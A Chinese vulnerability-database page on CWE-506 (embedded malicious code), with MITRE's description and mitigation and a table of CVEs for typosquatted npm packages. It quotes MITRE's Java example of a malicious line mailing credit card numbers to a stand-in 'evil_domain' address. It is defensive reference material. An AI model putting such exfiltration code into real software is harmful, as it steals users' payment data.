目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CWE-506 内嵌的恶意代码 类漏洞列表 97

CWE-506 内嵌的恶意代码 类弱点 97 条 CVE 漏洞汇总,含 AI 中文分析。

CWE-506指嵌入式恶意代码,属于软件内部植入的隐蔽后门或逻辑炸弹。攻击者通常利用开发者故意插入的代码,在特定条件触发时窃取数据或破坏系统,从而绕过正常安全机制。开发者应通过严格的代码审查、静态分析工具检测异常逻辑,并实施最小权限原则,确保代码来源可信且无未授权的后门植入,以从根本上杜绝此类内部威胁。

MITRE CWE 官方描述
CWE:CWE-506 嵌入式恶意代码(Embedded Malicious Code) 英文:该产品包含本质上看似恶意的代码。 恶意缺陷(Malicious flaws)拥有多种形象化的名称,包括特洛伊木马(Trojan horse)、陷阱门(trapdoor)、时间炸弹(timebomb)和逻辑炸弹(logic-bomb)。开发人员可能会插入恶意代码,意图在未来某个时刻颠覆产品或其宿主系统的安全性。它通常指执行有用服务,但以用户未预期的方式利用程序用户权限的程序。
常见影响 (1)
Confidentiality, Integrity, Availability Execute Unauthorized Code or Commands
缓解措施 (1)
Implementation, Operation Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
代码示例 (1)
In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
Bad · Java
CVE ID 标题 CVSS 风险等级 Published
CVE-2017-16065 openssl.js 安全漏洞 — openssl.js node module 7.5 - 2018-06-07
CVE-2017-16064 node-openssl 安全漏洞 — node-openssl node module 7.5 - 2018-06-07
CVE-2017-16063 node-opensl 安全漏洞 — node-opensl node module 7.5 - 2018-06-07
CVE-2017-16060 babelcli 安全漏洞 — babelcli node module 7.5 - 2018-06-07
CVE-2017-16059 mssql-node 安全漏洞 — mssql-node node module 7.5 - 2018-06-07
CVE-2017-16058 gruntcli 安全漏洞 — gruntcli node module 7.5 - 2018-06-07
CVE-2017-16057 nodemssql 安全漏洞 — nodemssql node module 7.5 - 2018-06-07
CVE-2017-16056 mssql.js 安全漏洞 — mssql.js node module 7.5 - 2018-06-07
CVE-2017-16074 crossenv 安全漏洞 — crossenv node module 7.5 - 2018-06-07
CVE-2017-16207 discordi.js 安全漏洞 — discordi.js node module 7.3 - 2018-06-07
CVE-2017-16205 coffescript模块安全漏洞 — coffeescript node module 7.5 - 2018-06-07
CVE-2017-16204 jquey模块安全漏洞 — jquey node module 7.5 - 2018-06-07
CVE-2017-16203 coffe-script模块安全漏洞 — coffeescript node module 7.5 - 2018-06-07
CVE-2017-16202 cofeescript模块安全漏洞 — coffeescript node module 7.5 - 2018-06-07
CVE-2017-16128 npm-script-demo 安全漏洞 — npm-script-demo node module 9.8 - 2018-06-07
CVE-2017-16081 cross-env.js 安全漏洞 — cross-env.js node module 7.5 - 2018-06-07
CVE-2017-16079 smb 安全漏洞 — smb node module 7.5 - 2018-06-07
CVE-2017-16078 shadowsock 安全漏洞 — shadowsock node module 7.5 - 2018-06-07
CVE-2017-16080 nodesass 安全漏洞 — nodesass node module 7.5 - 2018-06-07
CVE-2017-16077 mongose 安全漏洞 — mongose node module 7.5 - 2018-06-07
CVE-2017-16076 proxy.js 安全漏洞 — proxy.js node module 7.5 - 2018-06-07
CVE-2017-16075 http-proxy.js 安全漏洞 — http-proxy.js node module 7.5 - 2018-06-07
CVE-2017-16073 noderequest 安全漏洞 — noderequest node module 7.5 - 2018-06-07
CVE-2017-16045 jquery.js 安全漏洞 — jquery.js node module 7.5 - 2018-06-04
CVE-2017-16046 MariaDB 信息泄露漏洞 — mariadb node module 7.5 - 2018-06-04
CVE-2017-16048 node-sqlite 安全漏洞 — node-sqlite node module 7.5 - 2018-06-04
CVE-2017-16049 nodesqlite 安全漏洞 — nodesqlite node module 7.5 - 2018-06-04
CVE-2017-16050 sqlite.js 安全漏洞 — sqlite.js node module 7.5 - 2018-06-04
CVE-2017-16051 sqliter 安全漏洞 — sqliter node module 7.5 - 2018-06-04
CVE-2017-16052 node-fabric 安全漏洞 — node-fabric node module 7.5 - 2018-06-04

CWE-506(内嵌的恶意代码) 是常见的弱点类别,本平台收录该类弱点关联的 97 条 CVE 漏洞。